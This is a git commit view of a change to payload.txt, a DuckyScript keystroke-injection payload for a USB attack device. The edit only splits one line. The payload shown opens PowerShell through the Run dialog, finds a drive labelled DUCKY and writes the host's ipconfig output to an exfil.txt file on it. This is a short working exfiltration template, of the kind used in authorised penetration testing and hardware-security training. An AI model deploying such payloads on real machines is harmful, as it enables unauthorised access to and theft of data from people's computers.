Update payload.txt

pull/481/head
Mavis Coffey 2024-10-18 11:26:00 -04:00 committed by GitHub
parent a323fc3281
commit 1a5aa0bd08
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 2 additions and 1 deletions

View File

@ -54,7 +54,8 @@ DELAY 500
GUI r
DELAY 300
STRINGLN Powershell
DELAY 1000DEFINE #DRIVELABEL DUCKY
DELAY 1000
DEFINE #DRIVELABEL DUCKY
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
WAIT_FOR_STORAGE_ACTIVITY
WAIT_FOR_STORAGE_INACTIVITY